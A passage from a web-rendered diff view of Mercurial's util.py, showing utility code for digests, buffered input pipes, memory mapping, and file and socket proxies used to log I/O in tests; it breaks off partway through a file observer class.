##// END OF EJS Templates
util: fix the signature for the pypy override of sortdict.update()...
Matt Harbison -
r47662:64400d05 default
parent child Browse files
Show More
@@ -1,3730 +1,3732
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
4 # Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import collections
19 import collections
20 import contextlib
20 import contextlib
21 import errno
21 import errno
22 import gc
22 import gc
23 import hashlib
23 import hashlib
24 import itertools
24 import itertools
25 import locale
25 import locale
26 import mmap
26 import mmap
27 import os
27 import os
28 import platform as pyplatform
28 import platform as pyplatform
29 import re as remod
29 import re as remod
30 import shutil
30 import shutil
31 import socket
31 import socket
32 import stat
32 import stat
33 import sys
33 import sys
34 import time
34 import time
35 import traceback
35 import traceback
36 import warnings
36 import warnings
37
37
38 from .thirdparty import attr
38 from .thirdparty import attr
39 from .pycompat import (
39 from .pycompat import (
40 delattr,
40 delattr,
41 getattr,
41 getattr,
42 open,
42 open,
43 setattr,
43 setattr,
44 )
44 )
45 from .node import hex
45 from .node import hex
46 from hgdemandimport import tracing
46 from hgdemandimport import tracing
47 from . import (
47 from . import (
48 encoding,
48 encoding,
49 error,
49 error,
50 i18n,
50 i18n,
51 policy,
51 policy,
52 pycompat,
52 pycompat,
53 urllibcompat,
53 urllibcompat,
54 )
54 )
55 from .utils import (
55 from .utils import (
56 compression,
56 compression,
57 hashutil,
57 hashutil,
58 procutil,
58 procutil,
59 stringutil,
59 stringutil,
60 )
60 )
61
61
62 if pycompat.TYPE_CHECKING:
62 if pycompat.TYPE_CHECKING:
63 from typing import (
63 from typing import (
64 Iterator,
64 Iterator,
65 List,
65 List,
66 Optional,
66 Optional,
67 Tuple,
67 Tuple,
68 Union,
68 Union,
69 )
69 )
70
70
71
71
# Modules obtained through ``policy.importmod``.
base85 = policy.importmod('base85')
osutil = policy.importmod('osutil')

b85decode = base85.b85decode
b85encode = base85.b85encode

# Module-level aliases for names provided by pycompat.
cookielib = pycompat.cookielib
httplib = pycompat.httplib
pickle = pycompat.pickle
safehasattr = pycompat.safehasattr
socketserver = pycompat.socketserver
bytesio = pycompat.bytesio
# TODO deprecate stringio name, as it is a lie on Python 3.
stringio = bytesio
xmlrpclib = pycompat.xmlrpclib

# Module-level aliases for names provided by urllibcompat.
httpserver = urllibcompat.httpserver
urlerr = urllibcompat.urlerr
urlreq = urllibcompat.urlreq

# workaround for win32mbcs
_filenamebytestr = pycompat.bytestr
94
94
# Pick the platform implementation module once; everything below is an alias
# into it (or into ``osutil`` where noted).
if pycompat.iswindows:
    from . import windows as platform
else:
    from . import posix as platform

_ = i18n._

bindunixsocket = platform.bindunixsocket
cachestat = platform.cachestat
checkexec = platform.checkexec
checklink = platform.checklink
copymode = platform.copymode
expandglobs = platform.expandglobs
getfsmountpoint = platform.getfsmountpoint
getfstype = platform.getfstype
groupmembers = platform.groupmembers
groupname = platform.groupname
isexec = platform.isexec
isowner = platform.isowner
listdir = osutil.listdir
localpath = platform.localpath
lookupreg = platform.lookupreg
makedir = platform.makedir
nlinks = platform.nlinks
normpath = platform.normpath
normcase = platform.normcase
normcasespec = platform.normcasespec
normcasefallback = platform.normcasefallback
openhardlinks = platform.openhardlinks
oslink = platform.oslink
parsepatchoutput = platform.parsepatchoutput
pconvert = platform.pconvert
poll = platform.poll
posixfile = platform.posixfile
readlink = platform.readlink
rename = platform.rename
removedirs = platform.removedirs
samedevice = platform.samedevice
samefile = platform.samefile
samestat = platform.samestat
setflags = platform.setflags
split = platform.split
# use osutil's statfiles when it provides one, else the platform module's
statfiles = getattr(osutil, 'statfiles', platform.statfiles)
statisexec = platform.statisexec
statislink = platform.statislink
umask = platform.umask
unlink = platform.unlink
username = platform.username
143
143
144
144
def setumask(val):
    # type: (int) -> None
    """updates the umask. used by chg server

    Does nothing when ``pycompat.iswindows`` is true. Otherwise the process
    umask is set to ``val`` and both this module's ``umask`` and
    ``platform.umask`` are rebound to ``val & 0o777``.
    """
    global umask
    if pycompat.iswindows:
        return
    os.umask(val)
    platform.umask = umask = val & 0o777
153
153
154
154
# small compat layer
compengines = compression.compengines
SERVERROLE = compression.SERVERROLE
CLIENTROLE = compression.CLIENTROLE

# ``recvfds`` is only exported when the loaded osutil module provides it.
try:
    recvfds = osutil.recvfds
except AttributeError:
    pass

# Python compatibility

# unique sentinel object
_notset = object()
168
168
169
169
def bitsfrom(container):
    """Return the bitwise OR of every item yielded by ``container``.

    An empty ``container`` gives 0.
    """
    bits = 0
    for bit in container:
        bits |= bit
    return bits
175
175
176
176
# python 2.6 still has deprecation warnings enabled by default. We do not want
# to display anything to standard users, so detect if we are running tests and
# only use python deprecation warnings in this case.
_dowarn = bool(encoding.environ.get(b'HGEMITWARNINGS'))
if _dowarn:
    # explicitly unfilter our warning for python 2.7
    #
    # The option of setting PYTHONWARNINGS in the test runner was investigated.
    # However, module name set through PYTHONWARNINGS was exactly matched, so
    # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
    # makes the whole PYTHONWARNINGS thing useless for our usecase.
    warnings.filterwarnings('default', '', DeprecationWarning, 'mercurial')
    warnings.filterwarnings('default', '', DeprecationWarning, 'hgext')
    warnings.filterwarnings('default', '', DeprecationWarning, 'hgext3rd')
if _dowarn and pycompat.ispy3:
    # silence warning emitted by passing user string to re.sub()
    warnings.filterwarnings(
        'ignore', 'bad escape', DeprecationWarning, 'mercurial'
    )
    warnings.filterwarnings(
        'ignore', 'invalid escape sequence', DeprecationWarning, 'mercurial'
    )
    # TODO: reinvent imp.is_frozen()
    warnings.filterwarnings(
        'ignore',
        'the imp module is deprecated',
        DeprecationWarning,
        'mercurial',
    )
206
206
207
207
def nouideprecwarn(msg, version, stacklevel=1):
    """Issue a Python native deprecation warning

    This is a noop outside of tests, use 'ui.deprecwarn' when possible.

    ``msg`` and ``version`` are bytes; ``version`` is interpolated into the
    trailer appended to ``msg``. ``stacklevel`` is relative to the caller of
    this function (one extra frame is added before calling ``warnings.warn``).
    Nothing happens unless the module-level ``_dowarn`` flag is set.
    """
    if _dowarn:
        msg += (
            b"\n(compatibility will be dropped after Mercurial-%s,"
            b" update your code.)"
        ) % version
        warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
        # on python 3 with chg, we will need to explicitly flush the output
        sys.stderr.flush()
221
221
222
222
# Maps a digest name (bytes) to a callable returning a new hash object.
DIGESTS = {
    b'md5': hashlib.md5,
    b'sha1': hashutil.sha1,
    b'sha512': hashlib.sha512,
}
# List of digest types from strongest to weakest
DIGESTS_BY_STRENGTH = [b'sha512', b'sha1', b'md5']

# every name in the strength ordering must have an implementation
for k in DIGESTS_BY_STRENGTH:
    assert k in DIGESTS
233
233
234
234
class digester(object):
    """helper to compute digests.

    This helper can be used to compute one or more digests given their name.

    >>> d = digester([b'md5', b'sha1'])
    >>> d.update(b'foo')
    >>> [k for k in sorted(d)]
    ['md5', 'sha1']
    >>> d[b'md5']
    'acbd18db4cc2f85cedef654fccc4a4d8'
    >>> d[b'sha1']
    '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
    >>> digester.preferred([b'md5', b'sha1'])
    'sha1'
    """

    def __init__(self, digests, s=b''):
        """Create one hash object per name in ``digests``.

        Raises error.Abort for a name that is not a key of DIGESTS. When
        ``s`` is non-empty it is fed to every hash immediately.
        """
        self._hashes = {}
        for k in digests:
            if k not in DIGESTS:
                raise error.Abort(_(b'unknown digest type: %s') % k)
            self._hashes[k] = DIGESTS[k]()
        if s:
            self.update(s)

    def update(self, data):
        """Feed ``data`` to every hash object held by this digester."""
        for h in self._hashes.values():
            h.update(data)

    def __getitem__(self, key):
        """Return the hex digest for ``key``.

        Raises error.Abort when ``key`` is not a key of DIGESTS.
        """
        if key not in DIGESTS:
            # Format the name that was actually requested. This used to
            # interpolate ``k``, which is not a local of this method.
            raise error.Abort(_(b'unknown digest type: %s') % key)
        return hex(self._hashes[key].digest())

    def __iter__(self):
        """Iterate over the names of the digests being computed."""
        return iter(self._hashes)

    @staticmethod
    def preferred(supported):
        """returns the strongest digest type in both supported and DIGESTS."""

        for k in DIGESTS_BY_STRENGTH:
            if k in supported:
                return k
        return None
281
281
282
282
class digestchecker(object):
    """file handle wrapper that additionally checks content against a given
    size and digests.

        d = digestchecker(fh, size, {'md5': '...'})

    When multiple digests are given, all of them are validated.
    """

    def __init__(self, fh, size, digests):
        """Wrap ``fh``; ``size`` is the expected total length and ``digests``
        maps digest names to their expected hex values."""
        self._fh = fh
        self._size = size
        self._got = 0
        self._digests = dict(digests)
        self._digester = digester(self._digests.keys())

    def read(self, length=-1):
        """Read from the wrapped handle, feeding the data to the digester
        and counting the bytes returned."""
        content = self._fh.read(length)
        self._digester.update(content)
        self._got += len(content)
        return content

    def validate(self):
        """Raise error.Abort if the amount of data read or any of the
        digests differs from what was expected."""
        if self._size != self._got:
            raise error.Abort(
                _(b'size mismatch: expected %d, got %d')
                % (self._size, self._got)
            )
        for k, v in self._digests.items():
            # compute the digest once; it is needed for both the comparison
            # and the error message
            got = self._digester[k]
            if v != got:
                # i18n: first parameter is a digest name
                raise error.Abort(
                    _(b'%s mismatch: expected %s, got %s') % (k, v, got)
                )
318
318
319
319
try:
    buffer = buffer  # pytype: disable=name-error
except NameError:
    # No builtin ``buffer`` in this interpreter: provide a memoryview-based
    # replacement with the same call shape.

    def buffer(sliceable, offset=0, length=None):
        """Return a memoryview over ``sliceable`` starting at ``offset``.

        When ``length`` is not None the view covers at most ``length``
        items; otherwise it runs to the end of ``sliceable``.
        """
        if length is not None:
            return memoryview(sliceable)[offset : offset + length]
        return memoryview(sliceable)[offset:]
328
328
329
329
# default number of bytes requested from os.read() when filling the buffer
_chunksize = 4096


class bufferedinputpipe(object):
    """a manually buffered input pipe

    Python will not let us use buffered IO and lazy reading with 'polling' at
    the same time. We cannot probe the buffer state and select will not detect
    that data are ready to read if they are already buffered.

    This class lets us work around that by implementing its own buffering
    (allowing efficient readline) while offering a way to know if the buffer is
    empty from the output (allowing collaboration of the buffer with polling).

    This class lives in the 'util' module because it makes use of the 'os'
    module from the python stdlib.
    """

    def __new__(cls, fh):
        # If we receive a fileobjectproxy, we need to use a variation of this
        # class that notifies observers about activity.
        if isinstance(fh, fileobjectproxy):
            cls = observedbufferedinputpipe

        return super(bufferedinputpipe, cls).__new__(cls)

    def __init__(self, input):
        self._input = input
        # list of bytes chunks not yet handed out to the caller
        self._buffer = []
        # set once os.read() has returned no data
        self._eof = False
        # total number of bytes currently held in self._buffer
        self._lenbuf = 0

    @property
    def hasbuffer(self):
        """True if any data is currently buffered

        This will be used externally as a pre-step for polling IO. If there is
        already data then no polling should be set in place."""
        return bool(self._buffer)

    @property
    def closed(self):
        return self._input.closed

    def fileno(self):
        return self._input.fileno()

    def close(self):
        return self._input.close()

    def read(self, size):
        """return 'size' bytes, or fewer if end of file is reached first"""
        while (not self._eof) and (self._lenbuf < size):
            self._fillbuffer()
        return self._frombuffer(size)

    def unbufferedread(self, size):
        """return at most 'size' bytes, reading from the input at most once

        The input is only read when nothing is buffered yet."""
        if not self._eof and self._lenbuf == 0:
            self._fillbuffer(max(size, _chunksize))
        return self._frombuffer(min(self._lenbuf, size))

    def readline(self, *args, **kwargs):
        """return data up to and including the next newline

        At end of file, whatever is left in the buffer is returned. The
        arguments are accepted but not used."""
        if len(self._buffer) > 1:
            # this should not happen because both read and readline end with a
            # _frombuffer call that collapse it.
            self._buffer = [b''.join(self._buffer)]
            self._lenbuf = len(self._buffer[0])
        lfi = -1
        if self._buffer:
            lfi = self._buffer[-1].find(b'\n')
        while (not self._eof) and lfi < 0:
            self._fillbuffer()
            if self._buffer:
                # only the newest chunk can contain the first newline
                lfi = self._buffer[-1].find(b'\n')
        size = lfi + 1
        if lfi < 0:  # end of file
            size = self._lenbuf
        elif len(self._buffer) > 1:
            # we need to take previous chunks into account
            size += self._lenbuf - len(self._buffer[-1])
        return self._frombuffer(size)

    def _frombuffer(self, size):
        """return at most 'size' data from the buffer

        The data are removed from the buffer."""
        if size == 0 or not self._buffer:
            return b''
        buf = self._buffer[0]
        if len(self._buffer) > 1:
            buf = b''.join(self._buffer)

        data = buf[:size]
        buf = buf[len(data) :]
        if buf:
            self._buffer = [buf]
            self._lenbuf = len(buf)
        else:
            self._buffer = []
            self._lenbuf = 0
        return data

    def _fillbuffer(self, size=_chunksize):
        """read data to the buffer"""
        data = os.read(self._input.fileno(), size)
        if not data:
            self._eof = True
        else:
            self._lenbuf += len(data)
            self._buffer.append(data)

        return data
441
441
442
442
def mmapread(fp, size=None):
    """Return a read-only memory map of ``fp``.

    ``fp`` is either an object with a ``fileno()`` method or a file
    descriptor. ``size`` is the number of bytes to map; None maps the whole
    file. ``b''`` is returned when ``size`` is 0 or when the file is empty.
    A ValueError raised while creating the map is re-raised unless the file
    is empty.
    """
    if size == 0:
        # size of 0 to mmap.mmap() means "all data"
        # rather than "zero bytes", so special case that.
        return b''
    elif size is None:
        size = 0
    # Resolve the descriptor before entering the ``try``: a ValueError raised
    # by fileno() itself (e.g. on a closed file) must propagate unchanged
    # rather than reach the handler below with ``fd`` still unbound.
    fd = getattr(fp, 'fileno', lambda: fp)()
    try:
        return mmap.mmap(fd, size, access=mmap.ACCESS_READ)
    except ValueError:
        # Empty files cannot be mmapped, but mmapread should still work. Check
        # if the file is empty, and if so, return an empty buffer.
        if os.fstat(fd).st_size == 0:
            return b''
        raise
459
459
460
460
461 class fileobjectproxy(object):
461 class fileobjectproxy(object):
462 """A proxy around file objects that tells a watcher when events occur.
462 """A proxy around file objects that tells a watcher when events occur.
463
463
464 This type is intended to only be used for testing purposes. Think hard
464 This type is intended to only be used for testing purposes. Think hard
465 before using it in important code.
465 before using it in important code.
466 """
466 """
467
467
468 __slots__ = (
468 __slots__ = (
469 '_orig',
469 '_orig',
470 '_observer',
470 '_observer',
471 )
471 )
472
472
473 def __init__(self, fh, observer):
473 def __init__(self, fh, observer):
474 object.__setattr__(self, '_orig', fh)
474 object.__setattr__(self, '_orig', fh)
475 object.__setattr__(self, '_observer', observer)
475 object.__setattr__(self, '_observer', observer)
476
476
477 def __getattribute__(self, name):
477 def __getattribute__(self, name):
478 ours = {
478 ours = {
479 '_observer',
479 '_observer',
480 # IOBase
480 # IOBase
481 'close',
481 'close',
482 # closed if a property
482 # closed if a property
483 'fileno',
483 'fileno',
484 'flush',
484 'flush',
485 'isatty',
485 'isatty',
486 'readable',
486 'readable',
487 'readline',
487 'readline',
488 'readlines',
488 'readlines',
489 'seek',
489 'seek',
490 'seekable',
490 'seekable',
491 'tell',
491 'tell',
492 'truncate',
492 'truncate',
493 'writable',
493 'writable',
494 'writelines',
494 'writelines',
495 # RawIOBase
495 # RawIOBase
496 'read',
496 'read',
497 'readall',
497 'readall',
498 'readinto',
498 'readinto',
499 'write',
499 'write',
500 # BufferedIOBase
500 # BufferedIOBase
501 # raw is a property
501 # raw is a property
502 'detach',
502 'detach',
503 # read defined above
503 # read defined above
504 'read1',
504 'read1',
505 # readinto defined above
505 # readinto defined above
506 # write defined above
506 # write defined above
507 }
507 }
508
508
509 # We only observe some methods.
509 # We only observe some methods.
510 if name in ours:
510 if name in ours:
511 return object.__getattribute__(self, name)
511 return object.__getattribute__(self, name)
512
512
513 return getattr(object.__getattribute__(self, '_orig'), name)
513 return getattr(object.__getattribute__(self, '_orig'), name)
514
514
515 def __nonzero__(self):
515 def __nonzero__(self):
516 return bool(object.__getattribute__(self, '_orig'))
516 return bool(object.__getattribute__(self, '_orig'))
517
517
518 __bool__ = __nonzero__
518 __bool__ = __nonzero__
519
519
520 def __delattr__(self, name):
520 def __delattr__(self, name):
521 return delattr(object.__getattribute__(self, '_orig'), name)
521 return delattr(object.__getattribute__(self, '_orig'), name)
522
522
523 def __setattr__(self, name, value):
523 def __setattr__(self, name, value):
524 return setattr(object.__getattribute__(self, '_orig'), name, value)
524 return setattr(object.__getattribute__(self, '_orig'), name, value)
525
525
526 def __iter__(self):
526 def __iter__(self):
527 return object.__getattribute__(self, '_orig').__iter__()
527 return object.__getattribute__(self, '_orig').__iter__()
528
528
529 def _observedcall(self, name, *args, **kwargs):
529 def _observedcall(self, name, *args, **kwargs):
530 # Call the original object.
530 # Call the original object.
531 orig = object.__getattribute__(self, '_orig')
531 orig = object.__getattribute__(self, '_orig')
532 res = getattr(orig, name)(*args, **kwargs)
532 res = getattr(orig, name)(*args, **kwargs)
533
533
534 # Call a method on the observer of the same name with arguments
534 # Call a method on the observer of the same name with arguments
535 # so it can react, log, etc.
535 # so it can react, log, etc.
536 observer = object.__getattribute__(self, '_observer')
536 observer = object.__getattribute__(self, '_observer')
537 fn = getattr(observer, name, None)
537 fn = getattr(observer, name, None)
538 if fn:
538 if fn:
539 fn(res, *args, **kwargs)
539 fn(res, *args, **kwargs)
540
540
541 return res
541 return res
542
542
543 def close(self, *args, **kwargs):
543 def close(self, *args, **kwargs):
544 return object.__getattribute__(self, '_observedcall')(
544 return object.__getattribute__(self, '_observedcall')(
545 'close', *args, **kwargs
545 'close', *args, **kwargs
546 )
546 )
547
547
548 def fileno(self, *args, **kwargs):
548 def fileno(self, *args, **kwargs):
549 return object.__getattribute__(self, '_observedcall')(
549 return object.__getattribute__(self, '_observedcall')(
550 'fileno', *args, **kwargs
550 'fileno', *args, **kwargs
551 )
551 )
552
552
553 def flush(self, *args, **kwargs):
553 def flush(self, *args, **kwargs):
554 return object.__getattribute__(self, '_observedcall')(
554 return object.__getattribute__(self, '_observedcall')(
555 'flush', *args, **kwargs
555 'flush', *args, **kwargs
556 )
556 )
557
557
558 def isatty(self, *args, **kwargs):
558 def isatty(self, *args, **kwargs):
559 return object.__getattribute__(self, '_observedcall')(
559 return object.__getattribute__(self, '_observedcall')(
560 'isatty', *args, **kwargs
560 'isatty', *args, **kwargs
561 )
561 )
562
562
563 def readable(self, *args, **kwargs):
563 def readable(self, *args, **kwargs):
564 return object.__getattribute__(self, '_observedcall')(
564 return object.__getattribute__(self, '_observedcall')(
565 'readable', *args, **kwargs
565 'readable', *args, **kwargs
566 )
566 )
567
567
568 def readline(self, *args, **kwargs):
568 def readline(self, *args, **kwargs):
569 return object.__getattribute__(self, '_observedcall')(
569 return object.__getattribute__(self, '_observedcall')(
570 'readline', *args, **kwargs
570 'readline', *args, **kwargs
571 )
571 )
572
572
573 def readlines(self, *args, **kwargs):
573 def readlines(self, *args, **kwargs):
574 return object.__getattribute__(self, '_observedcall')(
574 return object.__getattribute__(self, '_observedcall')(
575 'readlines', *args, **kwargs
575 'readlines', *args, **kwargs
576 )
576 )
577
577
def seek(self, *args, **kwargs):
    """Run ``seek`` through ``_observedcall`` and return its result.

    Positional and keyword arguments are passed along unchanged.
    """
    # Fetch the helper with object.__getattribute__ directly.
    observed = object.__getattribute__(self, '_observedcall')
    return observed('seek', *args, **kwargs)
582
582
def seekable(self, *args, **kwargs):
    """Run ``seekable`` through ``_observedcall`` and return its result.

    Positional and keyword arguments are passed along unchanged.
    """
    # Fetch the helper with object.__getattribute__ directly.
    observed = object.__getattribute__(self, '_observedcall')
    return observed('seekable', *args, **kwargs)
587
587
def tell(self, *args, **kwargs):
    """Run ``tell`` through ``_observedcall`` and return its result.

    Positional and keyword arguments are passed along unchanged.
    """
    # Fetch the helper with object.__getattribute__ directly.
    observed = object.__getattribute__(self, '_observedcall')
    return observed('tell', *args, **kwargs)
592
592
def truncate(self, *args, **kwargs):
    """Run ``truncate`` through ``_observedcall`` and return its result.

    Positional and keyword arguments are passed along unchanged.
    """
    # Fetch the helper with object.__getattribute__ directly.
    observed = object.__getattribute__(self, '_observedcall')
    return observed('truncate', *args, **kwargs)
597
597
def writable(self, *args, **kwargs):
    """Run ``writable`` through ``_observedcall`` and return its result.

    Positional and keyword arguments are passed along unchanged.
    """
    # Fetch the helper with object.__getattribute__ directly.
    observed = object.__getattribute__(self, '_observedcall')
    return observed('writable', *args, **kwargs)
602
602
def writelines(self, *args, **kwargs):
    """Run ``writelines`` through ``_observedcall`` and return its result.

    Positional and keyword arguments are passed along unchanged.
    """
    # Fetch the helper with object.__getattribute__ directly.
    observed = object.__getattribute__(self, '_observedcall')
    return observed('writelines', *args, **kwargs)
607
607
def read(self, *args, **kwargs):
    """Run ``read`` through ``_observedcall`` and return its result.

    Positional and keyword arguments are passed along unchanged.
    """
    # Fetch the helper with object.__getattribute__ directly.
    observed = object.__getattribute__(self, '_observedcall')
    return observed('read', *args, **kwargs)
612
612
def readall(self, *args, **kwargs):
    """Run ``readall`` through ``_observedcall`` and return its result.

    Positional and keyword arguments are passed along unchanged.
    """
    # Fetch the helper with object.__getattribute__ directly.
    observed = object.__getattribute__(self, '_observedcall')
    return observed('readall', *args, **kwargs)
617
617
def readinto(self, *args, **kwargs):
    """Run ``readinto`` through ``_observedcall`` and return its result.

    Positional and keyword arguments are passed along unchanged.
    """
    # Fetch the helper with object.__getattribute__ directly.
    observed = object.__getattribute__(self, '_observedcall')
    return observed('readinto', *args, **kwargs)
622
622
def write(self, *args, **kwargs):
    """Run ``write`` through ``_observedcall`` and return its result.

    Positional and keyword arguments are passed along unchanged.
    """
    # Fetch the helper with object.__getattribute__ directly.
    observed = object.__getattribute__(self, '_observedcall')
    return observed('write', *args, **kwargs)
627
627
def detach(self, *args, **kwargs):
    """Run ``detach`` through ``_observedcall`` and return its result.

    Positional and keyword arguments are passed along unchanged.
    """
    # Fetch the helper with object.__getattribute__ directly.
    observed = object.__getattribute__(self, '_observedcall')
    return observed('detach', *args, **kwargs)
632
632
def read1(self, *args, **kwargs):
    """Run ``read1`` through ``_observedcall`` and return its result.

    Positional and keyword arguments are passed along unchanged.
    """
    # Fetch the helper with object.__getattribute__ directly.
    observed = object.__getattribute__(self, '_observedcall')
    return observed('read1', *args, **kwargs)
637
637
638
638
class observedbufferedinputpipe(bufferedinputpipe):
    """A ``bufferedinputpipe`` that reports its activity to an observer.

    ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
    bypass ``fileobjectproxy``, so the proxy's observer would otherwise
    never hear about them.

    This subclass looks up the observer on ``self._input._observer`` and,
    when the observer defines the matching hook, notifies it about buffer
    fills (``osread``) as well as ``read()`` (``bufferedread``) and
    ``readline()`` (``bufferedreadline``) calls made on this object.
    """

    def _fillbuffer(self):
        """Fill the buffer via the parent class, then report ``osread``."""
        filled = super(observedbufferedinputpipe, self)._fillbuffer()

        callback = getattr(self._input._observer, 'osread', None)
        if callback:
            callback(filled, _chunksize)

        return filled

    # The hooks below have their own names because the operation is
    # performed on this buffering object, not on the underlying file object.
    def read(self, size):
        """Read ``size`` via the parent class, then report ``bufferedread``."""
        data = super(observedbufferedinputpipe, self).read(size)

        callback = getattr(self._input._observer, 'bufferedread', None)
        if callback:
            callback(data, size)

        return data

    def readline(self, *args, **kwargs):
        """Read a line via the parent class, then report it.

        The observer hook used is ``bufferedreadline``; it only receives
        the line that was read, not the call arguments.
        """
        line = super(observedbufferedinputpipe, self).readline(*args, **kwargs)

        callback = getattr(self._input._observer, 'bufferedreadline', None)
        if callback:
            callback(line)

        return line
679
679
680
680
# Attribute names that ``socketproxy.__getattribute__`` resolves on the proxy
# itself; any other name is looked up on the wrapped socket.
PROXIED_SOCKET_METHODS = {
    # Turning the socket into a file object.
    'makefile',
    # Receiving.
    'recv',
    'recv_into',
    'recvfrom',
    'recvfrom_into',
    # Sending.
    'send',
    'sendall',
    'sendto',
    # Socket state.
    'gettimeout',
    'setblocking',
    'setsockopt',
    'settimeout',
}
695
695
696
696
class socketproxy(object):
    """A proxy around a socket that tells a watcher when events occur.

    This is like ``fileobjectproxy`` except for sockets.

    This type is intended to only be used for testing purposes. Think hard
    before using it in important code.

    Attribute names listed in ``PROXIED_SOCKET_METHODS`` resolve to the
    methods defined here; every other attribute read, write or delete is
    forwarded to the wrapped socket. Each proxied method calls the real
    socket method first and then, if the observer has a method of the same
    name, calls it as ``observer.<name>(result, *args, **kwargs)``.
    """

    __slots__ = (
        '_orig',
        '_observer',
    )

    def __init__(self, sock, observer):
        """Wrap ``sock`` and report proxied calls to ``observer``."""
        # __setattr__ below forwards to the wrapped socket, so the proxy's
        # own slots have to be assigned through object.__setattr__.
        object.__setattr__(self, '_orig', sock)
        object.__setattr__(self, '_observer', observer)

    def __getattribute__(self, name):
        if name in PROXIED_SOCKET_METHODS:
            return object.__getattribute__(self, name)

        return getattr(object.__getattribute__(self, '_orig'), name)

    def __delattr__(self, name):
        return delattr(object.__getattribute__(self, '_orig'), name)

    def __setattr__(self, name, value):
        return setattr(object.__getattribute__(self, '_orig'), name, value)

    def __nonzero__(self):
        return bool(object.__getattribute__(self, '_orig'))

    __bool__ = __nonzero__

    def _observedcall(self, name, *args, **kwargs):
        """Call ``name`` on the wrapped socket, then notify the observer.

        Returns whatever the wrapped socket's method returned. The observer
        is only notified after the real call has returned; if that call
        raises, the exception propagates and the observer is not called.
        """
        # Call the original object.
        orig = object.__getattribute__(self, '_orig')
        res = getattr(orig, name)(*args, **kwargs)

        # Call a method on the observer of the same name with arguments
        # so it can react, log, etc.
        observer = object.__getattribute__(self, '_observer')
        fn = getattr(observer, name, None)
        if fn:
            fn(res, *args, **kwargs)

        return res

    def makefile(self, *args, **kwargs):
        """Create a file object for the socket and wrap it for logging."""
        res = object.__getattribute__(self, '_observedcall')(
            'makefile', *args, **kwargs
        )

        # The file object may be used for I/O. So we turn it into a
        # proxy using our observer.
        observer = object.__getattribute__(self, '_observer')
        return makeloggingfileobject(
            observer.fh,
            res,
            observer.name,
            reads=observer.reads,
            writes=observer.writes,
            logdata=observer.logdata,
            logdataapis=observer.logdataapis,
        )

    def recv(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'recv', *args, **kwargs
        )

    def recvfrom(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'recvfrom', *args, **kwargs
        )

    def recvfrom_into(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'recvfrom_into', *args, **kwargs
        )

    def recv_into(self, *args, **kwargs):
        # The name passed here must match the socket method exactly: it is
        # used for the getattr() on both the socket and the observer.
        return object.__getattribute__(self, '_observedcall')(
            'recv_into', *args, **kwargs
        )

    def send(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'send', *args, **kwargs
        )

    def sendall(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'sendall', *args, **kwargs
        )

    def sendto(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'sendto', *args, **kwargs
        )

    def setblocking(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'setblocking', *args, **kwargs
        )

    def settimeout(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'settimeout', *args, **kwargs
        )

    def gettimeout(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'gettimeout', *args, **kwargs
        )

    def setsockopt(self, *args, **kwargs):
        return object.__getattribute__(self, '_observedcall')(
            'setsockopt', *args, **kwargs
        )
818
818
819
819
class baseproxyobserver(object):
    """Shared state and data-logging helper for proxy observers.

    ``fh`` is the handle log output is written to, ``name`` is the prefix
    used on logged data lines, and ``logdata`` / ``logdataapis`` select
    what ``_writedata()`` emits.
    """

    def __init__(self, fh, name, logdata, logdataapis):
        self.fh = fh
        self.name = name
        self.logdata = logdata
        self.logdataapis = logdataapis

    def _writedata(self, data):
        """Write ``data`` to the log according to the logging flags.

        When ``logdataapis`` is set, the output written here continues a
        line that the caller has already started, so it begins with a line
        terminator or a ``:`` separator instead of the ``name>`` prefix.
        """
        out = self.fh

        if not self.logdata:
            # Payload logging is off: only terminate the API line, if any.
            if self.logdataapis:
                out.write(b'\n')
                out.flush()
            return

        if b'\n' in data:
            # Data with newlines is written to multiple lines, one
            # prefixed log line per input line.
            if self.logdataapis:
                out.write(b':\n')

            for chunk in data.splitlines(True):
                out.write(
                    b'%s> %s\n' % (self.name, stringutil.escapestr(chunk))
                )
            out.flush()
            return

        # Simple case writes all data on a single line.
        escaped = stringutil.escapestr(data)
        if self.logdataapis:
            out.write(b': %s\n' % escaped)
        else:
            out.write(b'%s> %s\n' % (self.name, escaped))
        out.flush()
855
855
856
856
class fileobjectobserver(baseproxyobserver):
    """Observer that logs operations performed on a file object.

    ``reads`` and ``writes`` switch logging of read-type and write-type
    operations on or off; the remaining arguments are handed to
    ``baseproxyobserver``.
    """

    def __init__(
        self, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
    ):
        super(fileobjectobserver, self).__init__(fh, name, logdata, logdataapis)
        self.reads = reads
        self.writes = writes

    def read(self, res, size=-1):
        """Log a ``read(size)`` call that returned ``res``."""
        if not self.reads:
            return

        # Python 3 can return None from reads at EOF instead of empty strings.
        payload = b'' if res is None else res

        # Suppress pointless read(-1) calls that return nothing. These
